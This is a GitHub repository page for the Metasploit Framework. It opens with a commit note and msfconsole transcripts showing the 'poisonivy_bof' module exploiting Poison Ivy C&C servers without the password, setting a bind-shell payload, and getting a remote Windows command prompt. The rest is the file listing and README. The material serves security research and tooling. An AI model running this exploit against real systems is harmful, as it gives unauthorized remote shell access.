0a0e7ab4ba
module removing the need for bruteforce in the case of an unknown server password by (ab)using the challenge-response as an encryption oracle, making it more reliable. The vulnerability has also been confirmed in versions 2.2.0 up to 2.3.1 and additional targets for these versions have been added as well. See http://samvartaka.github.io/malware/2015/09/07/poison-ivy-reliable-exploitation/ for details. ## Console output Below is an example of the new functionality (PIVY C2 server password is set to 'prettysecure' and unknown to attacker). Exploitation of versions 2.3.0 and 2.3.1 is similar. ### Version 2.3.2 (unknown password) ``` msf > use windows/misc/poisonivy_bof msf exploit(poisonivy_bof) > set RHOST 192.168.0.103 RHOST => 192.168.0.103 msf exploit(poisonivy_bof) > check [*] Vulnerable Poison Ivy C&C version 2.3.1/2.3.2 detected. [*] 192.168.0.103:3460 - The target appears to be vulnerable. msf exploit(poisonivy_bof) > set PAYLOAD windows/shell_bind_tcp PAYLOAD => windows/shell_bind_tcp msf exploit(poisonivy_bof) > exploit [*] Started bind handler [*] Performing handshake... [*] Sending exploit... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.3.2> ``` ### Version 2.2.0 (unknown password) ``` msf exploit(poisonivy_bof) > check [*] Vulnerable Poison Ivy C&C version 2.2.0 detected. [*] 192.168.0.103:3460 - The target appears to be vulnerable. msf exploit(poisonivy_bof) > show targets Exploit targets: Id Name -- ---- 0 Poison Ivy 2.2.0 on Windows XP SP3 / Windows 7 SP1 1 Poison Ivy 2.3.0 on Windows XP SP3 / Windows 7 SP1 2 Poison Ivy 2.3.1, 2.3.2 on Windows XP SP3 / Windows 7 SP1 msf exploit(poisonivy_bof) > set TARGET 0 TARGET => 0 msf exploit(poisonivy_bof) > exploit [*] Started bind handler [*] Performing handshake... [*] Sending exploit... Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Documents and Settings\winxp\Desktop\Poison Ivy\Poison Ivy 2.2.0> ``` |
||
---|---|---|
app | ||
config | ||
data | ||
db | ||
documentation | ||
external | ||
features | ||
lib | ||
modules | ||
plugins | ||
script | ||
scripts | ||
spec | ||
test | ||
tools | ||
.gitignore | ||
.gitmodules | ||
.mailmap | ||
.rspec | ||
.rubocop.yml | ||
.ruby-gemset | ||
.ruby-version | ||
.simplecov | ||
.travis.yml | ||
.yardopts | ||
CONTRIBUTING.md | ||
COPYING | ||
Gemfile | ||
Gemfile.local.example | ||
Gemfile.lock | ||
HACKING | ||
LICENSE | ||
README.md | ||
Rakefile | ||
metasploit-framework-db.gemspec | ||
metasploit-framework-full.gemspec | ||
metasploit-framework-pcap.gemspec | ||
metasploit-framework.gemspec | ||
msfbinscan | ||
msfconsole | ||
msfd | ||
msfelfscan | ||
msfmachscan | ||
msfpescan | ||
msfrop | ||
msfrpc | ||
msfrpcd | ||
msfupdate | ||
msfvenom |
README.md
Metasploit
The Metasploit Framework is released under a BSD-style license. See COPYING for more details.
The latest version of this software is available from: https://metasploit.com
Bug tracking and development information can be found at: https://github.com/rapid7/metasploit-framework
New bugs and feature requests should be directed to: http://r-7.co/MSF-BUGv1
API documentation for writing modules can be found at: https://rapid7.github.io/metasploit-framework/api
Questions and suggestions can be sent to: https://lists.sourceforge.net/lists/listinfo/metasploit-hackers
Installing
Generally, you should use the free installer, which contains all of the dependencies and will get you up and running with a few clicks. See the Dev Environment Setup if you'd like to deal with dependencies on your own.
Using Metasploit
Metasploit can do all sorts of things. The first thing you'll want to do
is start msfconsole
, but after that, you'll probably be best served by
reading Metasploit Unleashed, the great community
resources, or the wiki.
Contributing
See the Dev Environment Setup guide on GitHub, which will walk you through the whole process from installing all the dependencies, to cloning the repository, and finally to submitting a pull request. For slightly more information, see Contributing.